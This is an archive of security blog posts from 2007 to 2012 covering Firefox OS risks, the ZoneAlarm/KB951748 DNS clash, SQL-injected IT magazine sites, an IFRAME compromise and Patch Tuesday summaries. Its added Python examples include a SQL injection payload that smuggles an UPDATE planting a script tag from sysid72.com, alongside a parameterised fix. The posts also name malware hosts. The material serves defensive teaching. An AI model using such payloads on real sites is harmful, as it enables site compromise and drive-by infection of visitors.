
Showing posts with label security.

Wednesday 4 July 2012

Firefox OS: will it be safe?

Firefox OS is the new name for the "Boot to Gecko" project by the Mozilla Foundation. It's a fully-featured OS built on a Linux core, and this is what Mozilla have to say about it:

The Firefox OS for mobile devices is built on Mozilla’s “Boot to Gecko project” which unlocks many of the current limitations of web development on mobile, allowing HTML5 applications to access the underlying capabilities of a phone, previously only available to native applications on Unix and Linux based mobile OSes. Telefónica’s Digital unit joined forces with Mozilla earlier this year to take this work and showcase a new phone architecture where every phone feature (calling, messaging, games, etc.) is an HTML5 application.

Wait.. what? Basically, web content running in the browser engine can talk directly to the phone's hardware and operating system.. and this is being done at a time when other vendors are trying to keep the browser as separated as possible from the OS (process sandboxing, plug-in restrictions and the like) precisely to contain exploits.

This led me to pose the question in another publication: Firefox OS: will it be safe? Well, if you know Betteridge's Law of Headlines then the answer is probably "no".

We have been down this path before. ActiveX promised to allow the browser (in this case Internet Explorer) access to the system to allow it to do clever things. Yes, software authors could get their applications signed to demonstrate that they were trustworthy, but it was still a security nightmare. And despite the apparent death of ActiveX (when was the last time you installed an ActiveX component that wasn't Adobe Flash?) it still features prominently when it comes to patching.

And then there's Java. Java applets were meant to be safe because they ran in a sandbox, isolated from the rest of the machine. Fast forward to today.. and what is one of the most common vectors for malware infection? Yes, it's Java. Fundamentally the Java security model is broken, as the endless series of patches we see testifies.

From a security perspective, keeping the browser just as a browser and limiting the interaction it has with the OS is the best approach. But Firefox OS wants to turn that on its head. And while Mozilla will no doubt put in processes to try to ensure that it will be safe, the examples of Java and ActiveX show how difficult it can be to nail it down.

Why does it matter? There's a lot of hype about mobile malware at the moment, but in my experience it is still an almost insignificant threat. That will change though, as more and more smartphones and tablets are being used for financially sensitive transactions, and fundamentally a smartphone is just a small computer and it can be added to a botnet for evil purposes.

One last consideration is this - getting updates. As (mostly) Android users will know, OS updates tend to dry up shortly after launch, leaving the underlying system vulnerable.. although Apple owners tend to get updates for much longer. Keeping on top of security threats will require Mozilla, the manufacturers and the networks to co-operate closely to keep security updates rolling out. The Firefox OS model closely matches Android rather than Apple.. so Mozilla and its partners have their work cut out here too.

If you're interested, this article I wrote is a slightly different take on the subject.

Tuesday 30 June 2009

Password masking facepalm

A bizarre shot in the security vs usability argument, as reported by El Reg in Masked passwords must go, which covers research claiming that masked passwords are more trouble than they are worth.

A key bit of the argument? "Shoulder surfing is largely a phantom problem".. umm yeah, because people's passwords usually just show as blobs or stars so there's no point. If your damned password comes up as plaintext then you can betcha that it WILL be a problem.


Wednesday 27 May 2009

"Dealer warning as police investigate security imposters"

I don't usually recycle press releases, but this one is of interest. It's really aimed at mobile phone dealers and details the possibility of customer poaching through stolen paperwork, but it seems to have good general guidance that applies to most companies.

Dealer warning as police investigate security imposters
CRIMINAL gangs posing as security staff are targeting mobile phone dealers, according to experts.

Scammers are trying to trick staff into handing over confidential data by pretending to be from shredding companies according to one of the UK’s largest operators.

Competitors are even reported to be raiding the bins of dealers with lax security at their premises to uncover useful details about contract expiry dates.

Jim Watson, managing director of Shred Easy, which destroys confidential data for mobile phone dealers, said:

“Scammers are targeting dealers to get their hands on valuable paperwork. There has been a spate of people pretending to be working for Shred Easy and our competitors by trying to trick staff into handing over bags of confidential data that has been safely kept within a store.

“Mobile phone dealers are vigilant in terms of securely storing their data but when it comes to the disposal of that information they must be alert to con artists trying to trick them into handing it over.

“Major operators will suffer dearly and some independent dealers could even be put out of business if the data fell into the wrong hands. The loss of confidential phone numbers, contact details as well as details about contracts and customers would be devastating.

“We have already been in contact with the police and made them aware of the details. I can’t go into details about who was targeted for legal reasons but it was a major mobile phone retailer and we’ve ensured their staff are alert and follow the official policy for dealing with confidential waste.

“Dealers must also be alert to the fact that their competitors are fighting tooth and nail to get their hands on data and in some cases we’ve heard reports of competitors sifting the bins outside dealerships to get confidential customer details so they can be poached at a later date.”

Shred Easy offers five top tips for mobile phone dealers:

1) Always ask for identification
2) Only deal with an accredited shredding company
3) Make use of professional ‘onsite shredding vehicles’
4) Store confidential data securely in store
5) Don’t throw paperwork in the bin

See www.shreadeasy.com

While you might think to challenge someone coming into your business premises, how often do you check that people taking waste away are really who they say they are?

Wednesday 9 July 2008

ZoneAlarm: "The firewall has blocked Internet access to.."

If you have recently patched your Windows computer with KB951748 and have ZoneAlarm installed then you'll probably find that everything has stopped working with a message similar to:
ZoneAlarm Security Alert
The firewall has blocked Internet access to whatever.com (HTTP) from your computer (TCP Flags: S)

This is because the Microsoft patch you just applied (KB951748 is the DNS client fix from bulletin MS08-037) has made a fairly significant change to the way your PC looks up internet names (web pages, email hosts etc). Before the patch the resolver sent every DNS query from the same UDP source port; afterwards it picks a random port for each lookup, so that an attacker can't guess where to aim forged replies. ZoneAlarm isn't aware of that change, doesn't recognise the traffic on all those new ports, and at its default High setting for the Internet Zone consequently blocks it - which is why name lookups, and with them everything else, stop working.

It isn't really a fault with the patch, and given the nature of the change, you can perhaps expect ZoneAlarm not to cope [see note below]. If you really want some more technical background read this article at the Internet Storm Center: Multiple Vendors DNS Spoofing Vulnerability.

As a temporary workaround, the best advice is to uninstall KB951748 until ZoneAlarm is updated. It is an important update, but you are either going to have to disable ZoneAlarm or remove the patch, and at the moment my advice would be to stick with ZoneAlarm.
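If you want to see for yourself whether a machine's resolver is now using random source ports (and therefore why a port-keyed firewall rule no longer fits), the script below works it out from a packet capture. This is an added example and not part of the original post or of ZoneAlarm; the capture lines are constructed in tcpdump's DNS summary layout, which is an assumption about the input format, and the two sample captures are made up to show the before and after.

```python
"""Check whether a resolver's outbound DNS queries use randomised UDP source
ports and transaction IDs, the behaviour MS08-037 (KB951748) introduced.

Added example, not part of the original post or of ZoneAlarm. Input lines
are constructed in tcpdump's DNS summary layout (an assumed format):
    IP <src>.<sport> > <dst>.<dport>: <txid>+ A? <name>.
"""
import re

# Constructed sample captures. Before the patch the stub resolver reused one
# ephemeral port and handed out consecutive transaction IDs; afterwards both
# are spread out, which is exactly what a firewall keyed on one port trips over.
PRE_PATCH = [
    "IP 192.168.1.10.1026 > 192.168.1.1.53: 4321+ A? example.com.",
    "IP 192.168.1.10.1026 > 192.168.1.1.53: 4322+ A? example.net.",
    "IP 192.168.1.10.1026 > 192.168.1.1.53: 4323+ A? example.org.",
    "IP 192.168.1.10.1026 > 192.168.1.1.53: 4324+ A? mozilla.org.",
]
POST_PATCH = [
    "IP 192.168.1.10.49213 > 192.168.1.1.53: 17420+ A? example.com.",
    "IP 192.168.1.10.62077 > 192.168.1.1.53: 3991+ A? example.net.",
    "IP 192.168.1.10.51304 > 192.168.1.1.53: 60217+ A? example.org.",
    "IP 192.168.1.10.58888 > 192.168.1.1.53: 28050+ A? mozilla.org.",
]

LINE_RE = re.compile(
    r"IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): (?P<txid>\d+)"
)


def parse_queries(lines):
    """Return (source_port, txid) for every query line aimed at UDP/53."""
    queries = []
    for line in lines:
        m = LINE_RE.search(line)
        if m and m.group("dport") == "53":
            queries.append((int(m.group("sport")), int(m.group("txid"))))
    return queries


def assess(lines, min_queries=4):
    """Summarise port/txid spread and give a verdict.

    Verdicts, in priority order: 'insufficient data', 'fixed source port',
    'predictable transaction IDs', 'randomised'.
    """
    queries = parse_queries(lines)
    ports = {p for p, _ in queries}
    txids = [t for _, t in queries]
    # Consecutive IDs (each one greater than the last by 1) are trivially guessable.
    sequential = len(txids) > 1 and all(b - a == 1 for a, b in zip(txids, txids[1:]))
    if len(queries) < min_queries:
        verdict = "insufficient data"
    elif len(ports) == 1:
        verdict = "fixed source port"
    elif sequential:
        verdict = "predictable transaction IDs"
    else:
        verdict = "randomised"
    return {
        "queries": len(queries),
        "distinct_ports": len(ports),
        "distinct_txids": len(set(txids)),
        "verdict": verdict,
    }


def source_ports(lines):
    """The set of source ports a port-keyed firewall rule would now have to cover."""
    return sorted({p for p, _ in parse_queries(lines)})


if __name__ == "__main__":
    for label, capture in (("before KB951748", PRE_PATCH), ("after KB951748", POST_PATCH)):
        print(label, assess(capture), "ports:", source_ports(capture))
```

Feed it real lines from `tcpdump -n udp port 53` (or an equivalent Windows capture) and a "fixed source port" verdict on a patched machine tells you something else on the box, a personal firewall included, is still pinning the resolver to one port.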

To remove the patch in Windows XP (Vista will be similar):
  1. Click Start and select Control Panel (or Start.. Settings.. Control Panel depending on your setup).
  2. Open "Add or Remove Programs"
  3. Tick "Show Updates"
  4. Scroll down (probably very near the bottom of the list) to Security Update for Windows XP (KB951748) (Vista may be worded differently, but the key thing to look for is KB951748).
  5. Click Remove
  6. Follow the steps to remove the patch and then reboot
Keep an eye out on the ZoneAlarm Official Announcements forum for updates - hopefully your copy of ZoneAlarm should download a fix for it automatically. When you have downloaded the update for ZoneAlarm, then visit Windows Update and then reapply the patch.

Update 1:
Sandi made the following comment:
It is not necessary to uninstall the patch, or disable/remove Zonealarm. Simply reset the ZoneAlarm database:


"To solve this, just reset the ZA database and the ZA will be "fresh" as when it was first installed:

Boot your computer into the Safe Mode
Navigate to the c:\windows\internet logs folder
Delete the backup.rdb, iamdb.rdb, *.ldb and the tvDebug files in the folder
Clean the Recycle Bin
Reboot into the normal mode
ZA will be just like new with no previous settings or data

Once this is finished, reboot back into the normal mode and in the new network found windows, set the new network to Trusted.
Then do this to ensure the ZA is setup properly:

Make sure your DNS and DHCP server IP's are in your Firewall's Trusted zone. Finding DNS and DHCP servers, etc.

1. Go to Run and type in command and hit 'ok', and in the command then type in ipconfig /all then press the enter key. In the returned data list will be a line DNS and DHCP Servers with the IP address(s) listed out to the side. Make sure there is a space between the ipconfig and the /all, and the font is the same (no capitals).
2. In ZA on your machine on the Firewall, open the Zones tab, click Add and then select IP Address. Make sure the Zone is set to Trusted. Add the DNS IP(s) .
3. Click OK and Apply. Then do the same for the DHCP server.
4. The localhost address must be listed as Trusted.
5. The Generic Host Process (svchost.exe) as seen in the Zone Alarm's Program's list must have server rights for the Trusted Zone.
Plus it must have both Trusted and Internet Access."
Update 2:
ZoneAlarm have a press release with a couple of workarounds here.

Workaround to Sudden Loss of Internet Access Problem

Date Published : 8 July 2008

Date Last Revised : 9 July 2008

Overview : Microsoft Update KB951748 is known to cause loss of internet access for ZoneAlarm users on Windows XP/2000. Windows Vista users are not affected.

Impact : Sudden loss of internet access

Platforms Affected : ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, and ZoneAlarm Security Suite

Recommended Actions -

Download and install the latest versions which solve the loss of internet access problem here:

  • ZoneAlarm Internet Security Suite
  • ZoneAlarm Pro
  • ZoneAlarm Antivirus
  • ZoneAlarm Anti-Spyware
  • ZoneAlarm Basic Firewall
- or follow the directions below.

    Option 1: Move Internet Zone slider to Medium

    1. Navigate to the "ZoneAlarm Firewall" panel
    2. Click on the "Firewall" tab
    3. Move the "Internet Zone" slider to medium

    Option 2: Uninstall the hotfix

    1. Click the "Start Menu"
    2. Click "Control Panel", or click "Settings" then "Control Panel"
    3. Click on "Add or Remove Programs"
    4. On the top of the add/remove programs dialog box, you should see a checkbox that says "show updates". Select this checkbox
    5. Scroll down until you see "Security update for Windows (KB951748)"
    6. Click "Remove" to uninstall the hotfix

I must say what is kind of annoying about this whole thing is that ZoneAlarm is owned by Check Point, who will definitely have been in on the whole DNS update issue (the fix was co-ordinated across vendors well ahead of release) and could have updated the product in a more timely manner. Many users of ZoneAlarm have been left high and dry because they don't have the technical skills to fix this.

Wednesday 4 June 2008

Redmondmag.com and related sites serving up malware

One notable name that keeps coming up with regards to the latest round of SQL injection attacks is Redmondmag.com, published by 1105 Media, Inc, along with a number of its sister sites. For a publication aimed at IT professionals to be so badly hit by SQL injection attacks raises some eyebrows.

A quick bit of Google searching shows how bad it is: a search for sysid72.com "1105 media" shows 35 infected pages belonging to virtualizationreview.com, visualstudiomagazine.com, redmondmag.com, reddevnews.com and certcities.com. Searching for xiaobaishan.net "1105 media" comes up with 121 matches for tcpmag.com and certcities.com. There are similar hits when searching for en-us18.com and locale48.com.

An alternative search you can do is b.js "1105 media", where the current batch of injected JavaScript includes can clearly be seen (of course, this blog entry will also turn up for the same search string in time!)

This problem goes back to at least April, when redmondmag.com was infected by the nihaorr1.com attack.

Here's the thing: the sites showing up in Google are not infected at the moment, but they were when Google crawled them. Clearly 1105 Media cleans up the injected content quickly, but it has not yet closed the hole in the web application that lets the injection in, so the attackers simply come back. Perhaps 1105 Media should read some of their own articles on the subject (see redmondmag.com/news/article.asp?editorialsid=9928 - visit at your own risk!)
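For anyone wondering what "cleaning up quickly but not fixing the hole" looks like in code, here is the pattern side by side. This is an added example and is neither from the original post nor 1105 Media's own code. The 2008 mass-injection campaigns pushed a stacked SQL statement in through a query-string parameter and then walked every text column in an MS SQL database; here sqlite3 stands in for MS SQL, one table stands in for the cursor loop, and executescript() reproduces the stacked-statement behaviour classic ASP and ADO gave the attacker. The table and column names are assumptions; the script hostname is the one named above.

```python
"""Vulnerable versus parameterised UPDATE, and a scan for injected script tags.

Added example, not from the original post or 1105 Media's code. sqlite3 stands
in for MS SQL, and executescript() reproduces the stacked-statement behaviour
of classic ASP + ADO. Table and column names are assumptions; the script host
is the one named in the post.
"""
import sqlite3

# Attacker-controlled value for an "id" parameter: a valid id, then a second
# statement that appends a script tag to every row (constructed payload).
PAYLOAD = (
    "1; UPDATE articles SET body = body || "
    "'<script src=\"http://sysid72.com/b.js\"></script>'"
)


def make_db():
    """In-memory article table with three constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles ("
        "id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
        "views INTEGER NOT NULL DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [
            ("Patch Tuesday roundup", "Six bulletins this month."),
            ("Virtualization review", "Hypervisor comparison."),
            ("Cert news", "New exam objectives published."),
        ],
    )
    conn.commit()
    return conn


def bump_views_vulnerable(conn, article_id):
    """The request parameter is pasted straight into the SQL text.

    executescript() runs every statement in the string, as ADO did against
    MS SQL, so the attacker's second statement runs too.
    """
    conn.executescript(
        f"UPDATE articles SET views = views + 1 WHERE id = {article_id};"
    )


def bump_views_safe(conn, article_id):
    """Validate the parameter, then bind it; returns rows updated (0 if rejected)."""
    if not str(article_id).isdigit():
        return 0
    cur = conn.execute(
        "UPDATE articles SET views = views + 1 WHERE id = ?", (int(article_id),)
    )
    conn.commit()
    return cur.rowcount


def find_injected_rows(conn):
    """Ids of rows whose body carries a <script ... src= tag: the clean-up
    query a site operator runs after an attack (and keeps running while the
    hole stays open)."""
    rows = conn.execute(
        "SELECT id FROM articles WHERE body LIKE '%<script%src=%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    bump_views_vulnerable(db, PAYLOAD)
    print("vulnerable handler, rows now carrying a script tag:", find_injected_rows(db))
    db = make_db()
    print("safe handler, rows updated for the same payload:", bump_views_safe(db, PAYLOAD))
    print("safe handler, rows carrying a script tag:", find_injected_rows(db))
```

The clean-up query is the part 1105 Media clearly had; the parameterised handler is the part that was missing. Note that the safe version both validates the parameter and binds it: binding alone stops the injection, the validation just makes the rejection visible in logs rather than a silent "0 rows updated".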

Monday 14 January 2008

The BBC iPlayer in a corporate environment

The BBC have spent a lot of time and money developing the BBC iPlayer, and it turns out that it's just another P2P application running on Kontiki.

So, I've written a guide for corporate IT departments giving them a pointer as to what the iPlayer is all about and how to block it - which, it turns out, should be easy enough!

Blocking BBC iPlayer, 4OD and Sky-by-Broadband

Tuesday 24 July 2007

Empireonline.com compromised

The popular movie site Empireonline.com was compromised this morning, at around 9am UK time, with a rogue IFRAME. The site now appears to be fixed.

The IFRAME connects to a page called g.htm on g.ignfile.cn, which appears to be a malware server hosted in China. For obvious reasons, I'm not including a clickable link but see the screenshot of the source below:

g.htm loads a couple of IFRAMEs and has a web counter.

014.htm has some nasty obfuscated JavaScript:

The other IFRAME is called imags1.htm; this leads to a compromised file on a server called sexbb888.com. It is likely that the server has been hijacked and the site owners are unaware of the problem.

Both appear to be using variants of the MS07-017 animated cursor (ANI) exploit from April 2007, although the nature of the payload is uncertain.

In any case, the problem appears to be fixed and anyone with a fully patched system should have been protected. Still, it's a good example of how trusted sites can fall prey to malware pushers.
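A rogue IFRAME of this kind is easy to spot once you know what to look for: it points off-site and it is sized or positioned so that the visitor never sees it. The scanner below is an added example, not part of the original post; the page it parses is constructed, with the rogue frame copying the shape described above (an off-site IFRAME pulling g.htm from g.ignfile.cn), and the "hidden" heuristics are assumptions of my own tuned to the zero-size and off-screen tricks common in drive-by injections.

```python
"""Flag IFRAMEs that point off-site and are sized or positioned to be invisible.

Added example, not part of the original post. SAMPLE_PAGE is constructed; its
rogue frame copies the shape described in the post. The hidden-frame
heuristics are assumptions, not a standard.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: one legitimate on-site frame, one zero-size off-site frame
# of the kind described in the post, one off-screen frame from an ad partner,
# and one tiny but on-site tracking frame that should not be flagged.
SAMPLE_PAGE = """
<html><body>
<h1>Empire Online</h1>
<iframe src="/player/trailer.html" width="640" height="360"></iframe>
<iframe src="http://g.ignfile.cn/g.htm" width="0" height="0" frameborder="0"></iframe>
<IFRAME SRC="http://ads.example-partner.com/ad.html" STYLE="position:absolute; left:-9999px"></IFRAME>
<iframe src="http://static.empireonline.com/promo.html" width="1" height="1"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.frames.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """Zero/one-pixel dimensions, off-screen positioning, or display/visibility tricks."""
    width = attrs.get("width", "").strip().lower().rstrip("px")
    height = attrs.get("height", "").strip().lower().rstrip("px")
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = width in ("0", "1") or height in ("0", "1")
    offscreen = any(
        marker in style
        for marker in ("left:-", "top:-", "display:none", "visibility:hidden")
    )
    return tiny or offscreen


def is_offsite(src, site_domain):
    """True when the frame source resolves to a host outside site_domain."""
    host = urlparse(src).hostname
    if host is None:  # relative URL: same site by definition
        return False
    host = host.lower()
    return host != site_domain and not host.endswith("." + site_domain)


def find_rogue_iframes(html, site_domain):
    """Return the src of every iframe that is both off-site and hidden."""
    collector = IframeCollector()
    collector.feed(html)
    return [
        f.get("src", "")
        for f in collector.frames
        if is_offsite(f.get("src", ""), site_domain) and is_hidden(f)
    ]


if __name__ == "__main__":
    for src in find_rogue_iframes(SAMPLE_PAGE, "empireonline.com"):
        print("suspicious iframe:", src)
```

Run it over a saved copy of the page (never the live one in a browser) and treat every hit as something to review: the ad partner's off-screen frame above is flagged too, and that is the right behaviour, since deciding which off-site hidden frames are legitimate is a judgement the site owner has to make once, not something a scanner should guess.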

Wednesday 11 July 2007

MS07-039 clarification

Yesterday was Patch Tuesday, and amongst the usual load of vulnerabilities was MS07-039 - Vulnerability in Windows Active Directory Could Allow Remote Code Execution (926122) - however in this case Microsoft are a little vague about exactly which servers are impacted, referring only to "Active Directory Servers".

Well, what are Active Directory Servers? If you're running an AD environment then all servers are member servers of Active Directory. Does this mean that all servers need patching, or is it restricted to Domain Controller (DC) and Global Catalog (GC) servers only? Patching DCs and GCs isn't too big a deal.. patching all servers for MS07-039 would be a nightmare.

One clue is in Knowledge Base article 926122, which explains that this really is limited to servers performing the DC/GC role:

A hotfix was created to work around a problem in which the domain controller has to be restarted to let users renew their certificates. However, this hotfix let any user renew a certificate. This security update includes a hotfix to modify this behavior. After you install this security update, authentication is required for certificate renewal.

After you install this security update, only domain administrators and network administrators can renew certificates. Also, an administrator cannot delegate the right to renew certificates.

For such a critical vulnerability, Microsoft's wording is particularly vague. It does seem that it doesn't apply to plain member servers, but just to Domain Controllers (including Global Catalog servers, FSMO role holders etc). One caveat: the bulletin's affected-software list also includes Active Directory Application Mode (ADAM), so any member server or workstation with an ADAM instance installed needs the patch too. These are critical servers, so you should patch them soon before the bad guys get to them.

Wednesday 9 May 2007

Patch Tuesday

A number of nasty looking vulnerabilities. These are my takes on the seriousness of these flaws; you should evaluate them against your own organisation.

MS07-026 Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (931832)
A series of flaws in Microsoft Exchange 2003 and 2007, the most serious of which is a MIME decoding flaw which can allow a remote attacker to take complete control of the system through a specially crafted email message. This is an extremely serious problem because most corporate firewalls will not offer any protection against messages of this type. There are no known current exploits, but these usually come about very quickly after the vulnerability is announced.
Client impact: low
Server impact: high

MS07-029 Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966)
A critical flaw in the DNS server service can allow a remote attacker to take complete control of a system. This is clearly a significant threat to any servers running the DNS service role and they will need patching as soon as possible. This is being actively exploited at the moment. Corporate firewalls will mitigate against this somewhat, until an infected machine enters your network.
Client impact: low
Server impact: high

MS07-023 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (934233)
A depressingly familiar flaw in MS Office impacting Excel 2000, 2002, 2003 and 2007 and even Excel 2004 for the Mac. WSUS or some other patching method should be used to roll these out to client workstations. Safe server practices should mean that this is not so important for corporate servers.
Client impact: high
Server impact: low

MS07-024 Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (934232)
Another Office flaw, this time for Word 2000, 2002 and 2003 plus Microsoft Works 2004, 2005 and 2006 - but not Word 2007. This is being actively exploited and should be authorised for rollout as soon as possible.. Office 2000 installations will require manual remediation.
Client impact: high
Server impact: low

MS07-025 Vulnerability in Microsoft Office Could Allow Remote Code Execution (934873)
A vulnerability in the way Office handles drawing objects can be exploited by a specially crafted Office document (e.g. attached to an email) or an object embedded in a web site. This affects Office 2000, 2002, 2003 and 2007 and also Office 2004 for the Mac - primarily the Excel, Publisher and FrontPage components. It also impacts Excel Viewer 2003. This should be authorised for rollout to clients as soon as possible. Office 2000 will require manual remediation.
Client impact: high
Server impact: low

MS07-027 Cumulative Security Update for Internet Explorer (931768)
Various flaws in IE6 and IE7 on Windows 2000, XP, 2003 and Vista. Safe practice on servers should mitigate against this (i.e. restrict use of IE to Windows Update only). Some of these flaws are being actively exploited, so patch as soon as possible.
Client impact: high
Server impact: low

MS07-028 Vulnerability in CAPICOM Could Allow Remote Code Execution (931906)
Well, obviously high if you use this product, otherwise few people will be at risk.
Client impact: low
Server impact: low

Wednesday 10 January 2007

Patch Tuesday - January

A very small number of patches this month, none of which are critical for servers (assuming you don't read email, process Office documents or surf the web on a server) and which may not even require a reboot on most client PCs. I've ordered these roughly in order of importance.

MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution (929969)
This addresses an actively exploited flaw in IE and should be applied as soon as possible.
Client impact: high
Server impact: low

MS07-003 Vulnerabilities in Microsoft Outlook Could Allow Remote Code Execution (925938)
A series of potentially serious flaws that could lead to an exploit if the user opens a specially crafted email message. Outlook 2000 is vulnerable to this, but cannot be patched via WSUS so this would need to be applied manually where possible. Replaces MS06-055.
Client impact: high
Server impact: low

MS07-002 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (927198)
Similar to MS07-003, and Excel 2000 is similarly impacted with no WSUS remediation.
Client impact: high
Server impact: low

MS07-001 Vulnerability in Microsoft Office 2003 Brazilian Portuguese Grammar Checker Could Allow Remote Code Execution (921585)
This only impacts Office 2003 with the Brazilian Portuguese language pack. It should not be a big problem for most users.
Client impact: low
Server impact: low